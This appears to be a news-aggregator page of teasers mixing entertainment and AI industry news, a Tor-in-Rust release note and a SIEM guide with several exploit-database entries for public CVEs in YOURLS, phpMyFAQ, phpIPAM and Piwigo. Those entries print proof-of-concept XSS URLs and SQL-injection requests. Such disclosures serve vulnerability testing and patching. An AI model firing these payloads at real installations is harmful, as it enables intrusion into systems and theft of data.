Ironheart release schedule: what date and time will episodes 1 to 3 of the Marvel TV show launch on Disney+?
Ironheart will bring down the curtain on Marvel Phase 5 in the very near future,…
YOURLS 1.8.2 – Cross-Site Request Forgery (CSRF)
# Exploit Title: YOURLS 1.8.2 – Cross-Site Request Forgery (CSRF) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/yourls/yourls/ # Software Link: https://github.com/yourls/yourls/ # Version: 1.8.2 # Tested on: Windows # CVE : CVE-2022-0088 Proof Of Concept CSRF PoC …
Arti 1.8.0 released: Onion service improvements, prop 368, relay development, and more.
Arti is our ongoing project to create a next-generation Tor implementation in Rust. We’re happy to announce the latest release, Arti 1.8.0. This release introduces a new, usage-based, timeout for strongly isolated circuits, as specified in proposal 368. Arti now has experimental tokio-console support for development and debugging purposes. To use this feature, you will…
phpMyFAQ 3.1.7 – Reflected Cross-Site Scripting (XSS)
# Exploit Title: phpMyFAQ 3.1.7 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpmyfaq/ # Software Link: https://github.com/thorsten/phpmyfaq/ # Version: 3.1.7 # Tested on: Windows # CVE : CVE-2022-3766 Proof Of Concept GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29 Additional Conditions: – Ensure that no security mechanisms (like…
phpIPAM 1.5.1 – SQL Injection
# Exploit Title: phpIPAM 1.5.1 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2023-1211 Proof Of Concept POST /app/admin/custom-fields/edit-result.php HTTP/1.1 Host: phpipam Cookie: PHPSESSID=; csrf_cookie= Content-Type: application/x-www-form-urlencoded csrf_cookie=&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+–+&table=devices&Comment=sql_poc&NULL=YES **Prerequisites:** 1….
Piwigo 13.6.0 – SQL Injection
# Exploit Title: Piwigo 13.6.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/Piwigo/Piwigo # Software Link: https://github.com/Piwigo/Piwigo # Version: 13.6.0 # Tested on: Windows # CVE : CVE-2023-33362 Proof Of Concept: GET /admin.php?page=profile&user_id=’ OR 1=1 — HTTP/1.1 Host: piwigo Steps to Reproduce Login as an…
phpIPAM 1.6 – Reflected-Cross-Site Scripting (XSS)
# Exploit Title: phpIPAM 1.6 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2024-41357 Proof Of Concept # PoC to trigger XSS vulnerability in phpipam 1.6 # Ensure you are…
phpIPAM 1.6 – Reflected Cross-Site Scripting (XSS)
# Exploit Title: phpIPAM 1.6 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2024-41358 Proof Of Concept GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue Source link
Amazon Has New Frontier AI Models—and a Way for Customers to Build Their Own
Amazon has announced a new family of frontier artificial intelligence models—and a new way for customers to build frontier models of their own. The ecommerce giant announced the second generation of its Nova AI models at re:Invent, a company conference held in Las Vegas. The models are nowhere near as popular as those offered by…
AWS CEO Matt Garman Wants to Reassert Amazon’s Cloud Dominance in the AI Era
You might think Amazon’s biggest swing in the AI race was its $8 billion investment in Anthropic. But AWS has also been building in-house foundation models, new chips, massive data centers, and agents meant to keep enterprise customers locked inside its ecosystem. The company believes these offerings will give it an edge as businesses of…
Announcing Rapid7’s Next-Gen SIEM Buyer’s Guide
AI dominates headlines, yet one cornerstone of security operations keeps evolving to meet today’s threats. Security Information and Event Management (SIEM) has come a long way from basic logging. Modern platforms unify threat detection, investigation, and response with automation, context, and AI, so analysts can act faster and with confidence. That is the focus of…
